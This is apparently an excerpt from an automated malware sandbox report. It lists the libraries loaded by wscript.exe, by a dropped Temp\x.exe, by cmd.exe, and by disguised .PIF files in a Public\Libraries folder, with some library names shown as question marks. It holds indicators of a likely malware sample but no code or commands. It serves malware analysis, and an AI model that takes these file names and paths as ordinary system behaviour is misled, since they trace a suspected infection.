            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: url.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: smartscreenps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttpcom.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??????????.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??????????.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??????????.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ????.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???e???????????.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???e???????????.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: tquery.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppwmi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppcext.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winscard.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: wldp.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: amsi.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: userenv.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: profapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: version.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: rasman.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: secur32.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: schannel.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: version.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: url.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ieframe.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: userenv.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: netutils.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: wldp.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: propsys.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: amsi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: smartscreenps.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: winmm.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: wininet.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: profapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppc.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ???.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ???.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ???.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ??l.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ??l.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ?.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ?.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ??l.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ????.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ???e???????????.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ???e???????????.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ?.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ?.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ?.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ?.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ??l.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ??l.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppc.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppc.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppc.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppc.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: tquery.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: cryptdll.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: spp.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: vssapi.dllJump to behavior
